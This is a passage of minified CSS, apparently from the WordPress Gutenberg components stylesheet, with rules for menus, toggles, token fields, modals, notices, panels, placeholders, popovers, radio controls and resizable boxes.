svg{background:#1e1e1e;border-radius:1px;box-shadow:0 0 0 1px #1e1e1e;color:#fff}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-icon-only,.components-dropdown-menu__menu .components-menu-item.is-icon-only{width:auto}.components-dropdown-menu__menu .components-menu-item__button,.components-dropdown-menu__menu .components-menu-item__button.components-button{height:auto;min-height:40px;padding-left:8px;padding-right:8px;text-align:left}.components-duotone-picker__color-indicator:before{background:#0000}.components-duotone-picker__color-indicator>.components-button,.components-duotone-picker__color-indicator>.components-button.is-pressed:hover:not(:disabled){background:linear-gradient(-45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0);color:#0000}.components-duotone-picker__color-indicator>.components-button:hover:not(:disabled):not([aria-disabled=true]),.components-duotone-picker__color-indicator>.components-button:not([aria-disabled=true]):active{color:#0000}.components-color-list-picker,.components-color-list-picker__swatch-button{width:100%}.components-color-list-picker__color-picker{margin:8px 0}.components-color-list-picker__swatch-color{margin:2px}.components-external-link{text-decoration:none}.components-external-link__contents{text-decoration:underline}.components-external-link__icon{font-weight:400;margin-left:.5ch}.components-form-toggle{display:inline-block;height:16px;position:relative}.components-form-toggle .components-form-toggle__track{background-color:#fff;border:1px solid #949494;border-radius:8px;box-sizing:border-box;content:"";display:inline-block;height:16px;position:relative;vertical-align:top;width:32px}@media not (prefers-reduced-motion){.components-form-toggle .components-form-toggle__track{transition:background-color .2s ease,border-color .2s ease}}.components-form-toggle .components-form-toggle__track{overflow:hidden}.components-form-toggle .components-form-toggle__track:after{border-top:16px solid #0000;box-sizing:border-box;content:"";inset:0;position:absolute}@media not (prefers-reduced-motion){.components-form-toggle .components-form-toggle__track:after{transition:opacity .2s ease}}.components-form-toggle .components-form-toggle__track:after{opacity:0}.components-form-toggle .components-form-toggle__thumb{border-radius:50%;box-sizing:border-box;display:block;height:12px;left:2px;position:absolute;top:2px;width:12px}@media not (prefers-reduced-motion){.components-form-toggle .components-form-toggle__thumb{transition:transform .2s ease,background-color .2s ease-out}}.components-form-toggle .components-form-toggle__thumb{background-color:#1e1e1e;border:6px solid #0000;box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003}.components-form-toggle.is-checked .components-form-toggle__track{background-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-form-toggle.is-checked .components-form-toggle__track:after{opacity:1}.components-form-toggle .components-form-toggle__input:focus+.components-form-toggle__track{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000;outline-offset:2px}.components-form-toggle.is-checked .components-form-toggle__thumb{background-color:#fff;border-width:0;transform:translateX(16px)}.components-disabled .components-form-toggle,.components-form-toggle.is-disabled{opacity:.3}.components-form-toggle input.components-form-toggle__input[type=checkbox]{border:none;height:100%;left:0;margin:0;opacity:0;padding:0;position:absolute;top:0;width:100%;z-index:1}.components-form-toggle input.components-form-toggle__input[type=checkbox]:checked{background:none}.components-form-toggle input.components-form-toggle__input[type=checkbox]:before{content:""}.components-form-toggle input.components-form-toggle__input[type=checkbox]:not(:disabled,[aria-disabled=true]){cursor:pointer}.components-form-token-field__input-container{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.components-form-token-field__input-container{transition:box-shadow .1s linear}}@media (min-width:600px){.components-form-token-field__input-container{font-size:13px;line-height:normal}}.components-form-token-field__input-container:focus{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-form-token-field__input-container::-webkit-input-placeholder{color:#1e1e1e9e}.components-form-token-field__input-container::-moz-placeholder{color:#1e1e1e9e}.components-form-token-field__input-container:-ms-input-placeholder{color:#1e1e1e9e}.components-form-token-field__input-container{cursor:text;padding:0;width:100%}.components-form-token-field__input-container.is-disabled{background:#ddd;border-color:#ddd}.components-form-token-field__input-container.is-active{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-form-token-field__input-container input[type=text].components-form-token-field__input{background:inherit;border:0;box-shadow:none;color:var(--wp-components-color-foreground,#1e1e1e);display:inline-block;flex:1;font-family:inherit;font-size:16px;margin-left:4px;max-width:100%;min-height:24px;min-width:50px;padding:0;width:100%}@media (min-width:600px){.components-form-token-field__input-container input[type=text].components-form-token-field__input{font-size:13px}}.components-form-token-field.is-active .components-form-token-field__input-container input[type=text].components-form-token-field__input,.components-form-token-field__input-container input[type=text].components-form-token-field__input:focus{box-shadow:none;outline:none}.components-form-token-field__input-container .components-form-token-field__token+input[type=text].components-form-token-field__input{width:auto}.components-form-token-field__token{color:#1e1e1e;display:flex;font-size:13px;max-width:100%}.components-form-token-field__token.is-success .components-form-token-field__remove-token,.components-form-token-field__token.is-success .components-form-token-field__token-text{background:#4ab866}.components-form-token-field__token.is-error .components-form-token-field__remove-token,.components-form-token-field__token.is-error .components-form-token-field__token-text{background:#cc1818}.components-form-token-field__token.is-validating .components-form-token-field__remove-token,.components-form-token-field__token.is-validating .components-form-token-field__token-text{color:#757575}.components-form-token-field__token.is-borderless{padding:0 24px 0 0;position:relative}.components-form-token-field__token.is-borderless .components-form-token-field__token-text{background:#0000}.components-form-token-field__token.is-borderless:not(.is-disabled) .components-form-token-field__token-text{color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-form-token-field__token.is-borderless .components-form-token-field__remove-token{background:#0000;color:#757575;position:absolute;right:0;top:1px}.components-form-token-field__token.is-borderless.is-success .components-form-token-field__token-text{color:#4ab866}.components-form-token-field__token.is-borderless.is-error .components-form-token-field__token-text{color:#cc1818;padding:0 4px 0 6px}.components-form-token-field__token.is-borderless.is-validating .components-form-token-field__token-text{color:#1e1e1e}.components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{background:#ddd;display:inline-block;height:auto;min-width:unset}@media not (prefers-reduced-motion){.components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{transition:all .2s cubic-bezier(.4,1,.4,1)}}.components-form-token-field__token-text{border-radius:1px 0 0 1px;line-height:24px;overflow:hidden;padding:0 0 0 8px;text-overflow:ellipsis;white-space:nowrap}.components-form-token-field__remove-token.components-button{border-radius:0 1px 1px 0;color:#1e1e1e;line-height:10px;overflow:initial}.components-form-token-field__remove-token.components-button:hover:not(:disabled){color:#1e1e1e}.components-form-token-field__suggestions-list{flex:1 0 100%;max-height:128px;min-width:100%;overflow-y:auto}@media not (prefers-reduced-motion){.components-form-token-field__suggestions-list{transition:all .15s ease-in-out}}.components-form-token-field__suggestions-list{box-shadow:inset 0 1px 0 0 #949494;list-style:none;margin:0;padding:0}.components-form-token-field__suggestion{box-sizing:border-box;color:var(--wp-components-color-foreground,#1e1e1e);display:block;font-size:13px;margin:0;min-height:32px;padding:8px 12px}.components-form-token-field__suggestion.is-selected{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:var(--wp-components-color-foreground-inverted,#fff)}.components-form-token-field__suggestion[aria-disabled=true]{color:#949494;pointer-events:none}.components-form-token-field__suggestion[aria-disabled=true].is-selected{background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000)}.components-form-token-field__suggestion:not(.is-empty){cursor:pointer}@media (min-width:600px){.components-guide{width:600px}}.components-guide .components-modal__content{margin-top:0;padding:0}.components-guide .components-modal__content:before{content:none}.components-guide .components-modal__header{border-bottom:none;height:64px;padding:0;position:sticky}.components-guide .components-modal__header .components-button{align-self:flex-start;margin:8px 8px 0 0;position:static}.components-guide .components-modal__header .components-button:hover svg{fill:#fff}.components-guide .components-guide__container{display:flex;flex-direction:column;justify-content:space-between;margin-top:-64px;min-height:100%}.components-guide .components-guide__page{display:flex;flex-direction:column;justify-content:center;position:relative}@media (min-width:600px){.components-guide .components-guide__page{min-height:300px}}.components-guide .components-guide__footer{align-content:center;display:flex;height:36px;justify-content:center;margin:0 0 24px;padding:0 32px;position:relative;width:100%}.components-guide .components-guide__page-control{margin:0;text-align:center}.components-guide .components-guide__page-control li{display:inline-block;margin:0}.components-guide .components-guide__page-control .components-button{color:#e0e0e0;margin:-6px 0}.components-guide .components-guide__page-control li[aria-current=step] .components-button{color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-modal__frame.components-guide{border:none;max-height:575px;min-width:312px}@media (max-width:600px){.components-modal__frame.components-guide{margin:auto;max-width:calc(100vw - 32px)}}.components-button.components-guide__back-button,.components-button.components-guide__finish-button,.components-button.components-guide__forward-button{position:absolute}.components-button.components-guide__back-button{left:32px}.components-button.components-guide__finish-button,.components-button.components-guide__forward-button{right:32px}[role=region]{position:relative}.is-focusing-regions [role=region]:focus:after,[role=region].interface-interface-skeleton__content:focus-visible:after{bottom:0;content:"";left:0;pointer-events:none;position:absolute;right:0;top:0;z-index:1000000}.is-focusing-regions .editor-post-publish-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-entities-saved-states-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-publish-panel,.is-focusing-regions .interface-interface-skeleton__sidebar .editor-layout__toggle-sidebar-panel,.is-focusing-regions [role=region]:focus:after,.is-focusing-regions.is-distraction-free .interface-interface-skeleton__header .edit-post-header,[role=region].interface-interface-skeleton__content:focus-visible:after{outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-2/var(--wp-block-editor-iframe-zoom-out-scale, 1));outline-style:solid;outline-width:calc(var(--wp-admin-border-width-focus)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1))}.components-menu-group+.components-menu-group{border-top:1px solid #1e1e1e;padding-top:8px}.components-menu-group+.components-menu-group.has-hidden-separator{border-top:none;margin-top:0;padding-top:0}.components-menu-group:has(>div:empty){display:none}.components-menu-group__label{color:#757575;font-size:11px;font-weight:500;margin-bottom:12px;margin-top:4px;padding:0 8px;text-transform:uppercase;white-space:nowrap}.components-menu-item__button,.components-menu-item__button.components-button{width:100%}.components-menu-item__button.components-button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button.components-button[role=menuitemradio] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemradio] .components-menu-item__item:only-child{box-sizing:initial;padding-right:48px}.components-menu-item__button .components-menu-items__item-icon,.components-menu-item__button.components-button .components-menu-items__item-icon{display:inline-block;flex:0 0 auto}.components-menu-item__button .components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-items__item-icon.has-icon-right{margin-left:24px;margin-right:-2px}.components-menu-item__button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right{margin-left:8px}.components-menu-item__button .block-editor-block-icon,.components-menu-item__button.components-button .block-editor-block-icon{margin-left:-2px;margin-right:8px}.components-menu-item__button.components-button.is-primary,.components-menu-item__button.is-primary{justify-content:center}.components-menu-item__button.components-button.is-primary .components-menu-item__item,.components-menu-item__button.is-primary .components-menu-item__item{margin-right:0}.components-menu-item__button.components-button:disabled.is-tertiary,.components-menu-item__button.components-button[aria-disabled=true].is-tertiary,.components-menu-item__button:disabled.is-tertiary,.components-menu-item__button[aria-disabled=true].is-tertiary{background:none;color:var(--wp-components-color-accent-darker-10,var(--wp-admin-theme-color-darker-10,#2145e6));opacity:.3}.components-menu-item__info-wrapper{display:flex;flex-direction:column;margin-right:auto}.components-menu-item__info{color:#757575;font-size:12px;margin-top:4px;white-space:normal}.components-menu-item__item{align-items:center;display:inline-flex;margin-right:auto;min-width:160px;white-space:nowrap}.components-menu-item__shortcut{align-self:center;color:currentColor;display:none;margin-left:auto;margin-right:0;padding-left:24px}@media (min-width:480px){.components-menu-item__shortcut{display:inline}}.components-menu-items-choice,.components-menu-items-choice.components-button{height:auto;min-height:40px}.components-menu-items-choice svg,.components-menu-items-choice.components-button svg{margin-right:12px}.components-menu-items-choice.components-button.has-icon,.components-menu-items-choice.has-icon{padding-left:12px}.components-modal__screen-overlay{background-color:#00000059;bottom:0;display:flex;left:0;position:fixed;right:0;top:0;z-index:100000}@keyframes __wp-base-styles-fade-in{0%{opacity:0}to{opacity:1}}@media not (prefers-reduced-motion){.components-modal__screen-overlay{animation:__wp-base-styles-fade-in .08s linear 0s;animation-fill-mode:forwards}}@keyframes __wp-base-styles-fade-out{0%{opacity:1}to{opacity:0}}@media not (prefers-reduced-motion){.components-modal__screen-overlay.is-animating-out{animation:__wp-base-styles-fade-out .08s linear 80ms;animation-fill-mode:forwards}}.components-modal__frame{box-sizing:border-box}.components-modal__frame *,.components-modal__frame :after,.components-modal__frame :before{box-sizing:inherit}.components-modal__frame{animation-fill-mode:forwards;animation-name:components-modal__appear-animation;animation-timing-function:cubic-bezier(.29,0,0,1);background:#fff;border-radius:8px 8px 0 0;box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005;color:#1e1e1e;display:flex;margin:40px 0 0;overflow:hidden;width:100%}.components-modal__frame h1,.components-modal__frame h2,.components-modal__frame h3{color:#1e1e1e}@media not (prefers-reduced-motion){.components-modal__frame{animation-duration:var(--modal-frame-animation-duration)}}.components-modal__screen-overlay.is-animating-out .components-modal__frame{animation-name:components-modal__disappear-animation;animation-timing-function:cubic-bezier(1,0,.2,1)}@media (min-width:600px){.components-modal__frame{border-radius:8px;margin:auto;max-height:calc(100% - 128px);max-width:calc(100% - 32px);min-width:350px;width:auto}}@media (min-width:600px) and (min-width:600px){.components-modal__frame.is-full-screen{height:calc(100% - 32px);max-height:none;width:calc(100% - 32px)}}@media (min-width:600px) and (min-width:782px){.components-modal__frame.is-full-screen{height:calc(100% - 80px);max-width:none;width:calc(100% - 80px)}}@media (min-width:600px){.components-modal__frame.has-size-large,.components-modal__frame.has-size-medium,.components-modal__frame.has-size-small{width:100%}.components-modal__frame.has-size-small{max-width:384px}.components-modal__frame.has-size-medium{max-width:512px}.components-modal__frame.has-size-large{max-width:840px}}@media (min-width:960px){.components-modal__frame{max-height:70%}}@keyframes components-modal__appear-animation{0%{opacity:0;transform:scale(.9)}to{opacity:1;transform:scale(1)}}@keyframes components-modal__disappear-animation{0%{opacity:1;transform:scale(1)}to{opacity:0;transform:scale(.9)}}.components-modal__header{align-items:center;border-bottom:1px solid #0000;box-sizing:border-box;display:flex;flex-direction:row;height:72px;justify-content:space-between;left:0;padding:24px 32px 8px;position:absolute;top:0;width:100%;z-index:10}.components-modal__header .components-modal__header-heading{font-size:1.2rem;font-weight:600}.components-modal__header h1{line-height:1;margin:0}.components-modal__content.has-scrolled-content:not(.hide-header) .components-modal__header{border-bottom-color:#ddd}.components-modal__header+p{margin-top:0}.components-modal__header-heading-container{align-items:center;display:flex;flex-direction:row;flex-grow:1;justify-content:flex-start}.components-modal__header-icon-container{display:inline-block}.components-modal__header-icon-container svg{max-height:36px;max-width:36px;padding:8px}.components-modal__content{flex:1;margin-top:72px;overflow:auto;padding:4px 32px 32px}.components-modal__content.hide-header{margin-top:0;padding-top:32px}.components-modal__content.is-scrollable:focus-visible{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000;outline-offset:-2px}.components-notice{align-items:center;background-color:#fff;border-left:4px solid var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:#1e1e1e;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;padding:8px 12px}.components-notice.is-dismissible{position:relative}.components-notice.is-success{background-color:#eff9f1;border-left-color:#4ab866}.components-notice.is-warning{background-color:#fef8ee;border-left-color:#f0b849}.components-notice.is-error{background-color:#f4a2a2;border-left-color:#cc1818}.components-notice__content{flex-grow:1;margin:4px 25px 4px 0}.components-notice__actions{display:flex;flex-wrap:wrap}.components-notice__action.components-button,.components-notice__action.components-button.is-link{margin-left:12px}.components-notice__action.components-button.is-secondary{vertical-align:initial}.components-notice__action.components-button{margin-right:8px}.components-notice__dismiss{align-self:flex-start;color:#757575;flex-shrink:0}.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):focus,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):active,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{background-color:initial;color:#1e1e1e}.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{box-shadow:none}.components-notice-list{box-sizing:border-box;max-width:100vw}.components-notice-list .components-notice__content{line-height:2;margin-bottom:12px;margin-top:12px}.components-notice-list .components-notice__action.components-button{display:block;margin-left:0;margin-top:8px}.components-panel{background:#fff;border:1px solid #e0e0e0}.components-panel>.components-panel__body:first-child,.components-panel>.components-panel__header:first-child{margin-top:-1px}.components-panel>.components-panel__body:last-child,.components-panel>.components-panel__header:last-child{border-bottom-width:0}.components-panel+.components-panel{margin-top:-1px}.components-panel__body{border-bottom:1px solid #e0e0e0;border-top:1px solid #e0e0e0}.components-panel__body h3{margin:0 0 .5em}.components-panel__body.is-opened{padding:16px}.components-panel__header{align-items:center;border-bottom:1px solid #ddd;box-sizing:initial;display:flex;flex-shrink:0;height:47px;justify-content:space-between;padding:0 16px}.components-panel__header h2{color:inherit;font-size:inherit;margin:0}.components-panel__body+.components-panel__body,.components-panel__body+.components-panel__header,.components-panel__header+.components-panel__body,.components-panel__header+.components-panel__header{margin-top:-1px}.components-panel__body>.components-panel__body-title{display:block;font-size:inherit;margin-bottom:0;margin-top:0;padding:0}@media not (prefers-reduced-motion){.components-panel__body>.components-panel__body-title{transition:background .1s ease-in-out}}.components-panel__body.is-opened>.components-panel__body-title{margin:-16px -16px 5px}.components-panel__body>.components-panel__body-title:hover{background:#f0f0f0;border:none}.components-panel__body-toggle.components-button{border:none;box-shadow:none;color:#1e1e1e;font-weight:500;outline:none;padding:16px 48px 16px 16px;position:relative;text-align:left;width:100%}@media not (prefers-reduced-motion){.components-panel__body-toggle.components-button{transition:background .1s ease-in-out}}.components-panel__body-toggle.components-button{height:auto}.components-panel__body-toggle.components-button:focus{border-radius:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-panel__body-toggle.components-button .components-panel__arrow{color:#1e1e1e;position:absolute;right:16px;top:50%;transform:translateY(-50%);fill:currentColor}@media not (prefers-reduced-motion){.components-panel__body-toggle.components-button .components-panel__arrow{transition:color .1s ease-in-out}}body.rtl .components-panel__body-toggle.components-button .dashicons-arrow-right{-ms-filter:fliph;filter:FlipH;margin-top:-10px;transform:scaleX(-1)}.components-panel__icon{color:#757575;margin:-2px 0 -2px 6px}.components-panel__body-toggle-icon{margin-right:-5px}.components-panel__color-title{float:left;height:19px}.components-panel__row{align-items:center;display:flex;justify-content:space-between;margin-top:8px;min-height:36px}.components-panel__row select{min-width:0}.components-panel__row label{flex-shrink:0;margin-right:12px;max-width:75%}.components-panel__row:empty,.components-panel__row:first-of-type{margin-top:0}.components-panel .circle-picker{padding-bottom:20px}.components-placeholder.components-placeholder{align-items:flex-start;box-sizing:border-box;color:#1e1e1e;display:flex;flex-direction:column;font-size:13px;gap:16px;margin:0;padding:24px;position:relative;text-align:left;width:100%;-moz-font-smoothing:subpixel-antialiased;-webkit-font-smoothing:subpixel-antialiased;background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;outline:1px solid #0000}.components-placeholder__error,.components-placeholder__fieldset,.components-placeholder__instructions,.components-placeholder__label{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;letter-spacing:normal;line-height:normal;text-transform:none}.components-placeholder__label{align-items:center;display:flex;font-weight:600}.components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{margin-right:4px;fill:currentColor}@media (forced-colors:active){.components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{fill:CanvasText}}.components-placeholder__label:empty{display:none}.components-placeholder__fieldset,.components-placeholder__fieldset form{display:flex;flex-direction:row;flex-wrap:wrap;gap:16px;justify-content:flex-start;width:100%}.components-placeholder__fieldset form p,.components-placeholder__fieldset p{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.components-placeholder__fieldset.is-column-layout,.components-placeholder__fieldset.is-column-layout form{flex-direction:column}.components-placeholder__input[type=url]{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.components-placeholder__input[type=url]{transition:box-shadow .1s linear}}@media (min-width:600px){.components-placeholder__input[type=url]{font-size:13px;line-height:normal}}.components-placeholder__input[type=url]:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.components-placeholder__input[type=url]::-webkit-input-placeholder{color:#1e1e1e9e}.components-placeholder__input[type=url]::-moz-placeholder{color:#1e1e1e9e}.components-placeholder__input[type=url]:-ms-input-placeholder{color:#1e1e1e9e}.components-placeholder__input[type=url]{flex:1 1 auto}.components-placeholder__error{gap:8px;width:100%}.components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link{margin-left:10px;margin-right:10px}.components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link:last-child{margin-right:0}.components-placeholder.is-medium .components-placeholder__instructions,.components-placeholder.is-small .components-placeholder__instructions{display:none}.components-placeholder.is-medium .components-placeholder__fieldset,.components-placeholder.is-medium .components-placeholder__fieldset form,.components-placeholder.is-small .components-placeholder__fieldset,.components-placeholder.is-small .components-placeholder__fieldset form{flex-direction:column}.components-placeholder.is-medium .components-button,.components-placeholder.is-medium .components-placeholder__fieldset>*,.components-placeholder.is-small .components-button,.components-placeholder.is-small .components-placeholder__fieldset>*{justify-content:center;width:100%}.components-placeholder.is-small{padding:16px}.components-placeholder.has-illustration{backdrop-filter:blur(100px);backface-visibility:hidden;background-color:initial;border-radius:0;box-shadow:none;color:inherit;display:flex}.is-dark-theme .components-placeholder.has-illustration{background-color:#0000001a}.components-placeholder.has-illustration .components-placeholder__fieldset{margin-left:0;margin-right:0}.components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{opacity:0;pointer-events:none}@media not (prefers-reduced-motion){.components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{transition:opacity .1s linear}}.is-selected>.components-placeholder.has-illustration .components-button,.is-selected>.components-placeholder.has-illustration .components-placeholder__instructions,.is-selected>.components-placeholder.has-illustration .components-placeholder__label{opacity:1;pointer-events:auto}.components-placeholder.has-illustration:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.components-placeholder.has-illustration{overflow:hidden}.is-selected .components-placeholder.has-illustration{overflow:auto}.components-placeholder__preview{display:flex;justify-content:center}.components-placeholder__illustration{box-sizing:initial;height:100%;left:50%;position:absolute;top:50%;transform:translate(-50%,-50%);width:100%;stroke:currentColor;opacity:.25}.components-popover{box-sizing:border-box}.components-popover *,.components-popover :after,.components-popover :before{box-sizing:inherit}.components-popover{will-change:transform;z-index:1000000}.components-popover.is-expanded{bottom:0;left:0;position:fixed;right:0;top:0;z-index:1000000!important}.components-popover__content{background:#fff;border-radius:4px;box-shadow:0 0 0 1px #ccc,0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005;box-sizing:border-box;width:min-content}.is-alternate .components-popover__content{border-radius:2px;box-shadow:0 0 0 1px #1e1e1e}.is-unstyled .components-popover__content{background:none;border-radius:0;box-shadow:none}.components-popover.is-expanded .components-popover__content{box-shadow:0 -1px 0 0 #ccc;height:calc(100% - 48px);overflow-y:visible;position:static;width:auto}.components-popover.is-expanded.is-alternate .components-popover__content{box-shadow:0 -1px 0 #1e1e1e}.components-popover__header{align-items:center;background:#fff;display:flex;height:48px;justify-content:space-between;padding:0 8px 0 16px}.components-popover__header-title{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:100%}.components-popover__close.components-button{z-index:5}.components-popover__arrow{display:flex;height:14px;pointer-events:none;position:absolute;width:14px}.components-popover__arrow:before{background-color:#fff;content:"";height:2px;left:1px;position:absolute;right:1px;top:-1px}.components-popover__arrow.is-top{bottom:-14px!important;transform:rotate(0)}.components-popover__arrow.is-right{left:-14px!important;transform:rotate(90deg)}.components-popover__arrow.is-bottom{top:-14px!important;transform:rotate(180deg)}.components-popover__arrow.is-left{right:-14px!important;transform:rotate(-90deg)}.components-popover__triangle{display:block;flex:1}.components-popover__triangle-bg{fill:#fff}.components-popover__triangle-border{fill:#0000;stroke-width:1px;stroke:#ccc}.is-alternate .components-popover__triangle-border{stroke:#1e1e1e}.components-radio-control{border:0;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;margin:0;padding:0}.components-radio-control__group-wrapper.has-help{margin-block-end:12px}.components-radio-control__option{align-items:center;column-gap:8px;display:grid;grid-template-columns:auto 1fr;grid-template-rows:auto minmax(0,max-content)}.components-radio-control__input[type=radio]{border:1px solid #1e1e1e;border-radius:50%;grid-column:1;grid-row:1;height:24px;margin-right:12px;max-width:24px;min-width:24px;position:relative;transition:none;width:24px}@media not (prefers-reduced-motion){.components-radio-control__input[type=radio]{transition:box-shadow .1s linear}}@media (min-width:600px){.components-radio-control__input[type=radio]{height:16px;max-width:16px;min-width:16px;width:16px}}.components-radio-control__input[type=radio]:checked:before{background-color:#fff;border:4px solid #fff;box-sizing:inherit;height:12px;left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);width:12px}@media (min-width:600px){.components-radio-control__input[type=radio]:checked:before{height:8px;width:8px}}.components-radio-control__input[type=radio]:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color)}.components-radio-control__input[type=radio]:checked{background:var(--wp-admin-theme-color);border:none}.components-radio-control__input[type=radio]{appearance:none;cursor:pointer;display:inline-flex;margin:0;padding:0}.components-radio-control__input[type=radio]:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.components-radio-control__input[type=radio]:checked{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-radio-control__input[type=radio]:checked:before{border-radius:50%;content:""}.components-radio-control__label{cursor:pointer;grid-column:2;grid-row:1;line-height:24px}@media (min-width:600px){.components-radio-control__label{line-height:16px}}.components-radio-control__option-description{grid-column:2;grid-row:2;padding-block-start:4px}.components-radio-control__option-description.components-radio-control__option-description{margin-top:0}.components-resizable-box__handle{display:none;height:23px;width:23px;z-index:2}.components-resizable-box__container.has-show-handle .components-resizable-box__handle{display:block}.components-resizable-box__handle>div{height:100%;outline:none;position:relative;width:100%;z-index:2}.components-resizable-box__container>img{width:inherit}.components-resizable-box__handle:after{background:#fff;border-radius:50%;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)),0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;content:"";cursor:inherit;display:block;height:15px;outline:2px solid #0000;position:absolute;right:calc(50% - 8px);top:calc(50% - 8px);width:15px}.components-resizable-box__side-handle:before{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-radius:9999px;content:"";cursor:inherit;display:block;height:3px;position:absolute;right:calc(50% - 1px);top:calc(50% - 1px);width:3px}@media not (prefers-reduced-motion){.components-resizable-box__side-handle:before{transition:transform .1s ease-in;will-change:transform}}.components-resizable-box__side-handle:before{opacity:0}.components-resizable-box__corner-handle,.components-resizable-box__side-handle{z-index:2}.components-resizable-box__side-handle.components-resizable-box__handle-bottom,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:before,.components-resizable-box__side-handle.components-resizable-box__handle-top,.components-resizable-box__side-handle.components-resizable-box__handle-top:before{border-left:0;border-right:0;left:0;width:100%}.components-resizable-box__side-handle.components-resizable-box__handle-left,.components-resizable-box__side-handle.components-resizable-box__handle-left:before,.components-resizable-box__side-handle.components-resizable-box__handle-right,.components-resizable-box__side-handle.components-resizable-box__handle-right:before{border-bottom:0;border-top:0;height:100%;top:0}@media not 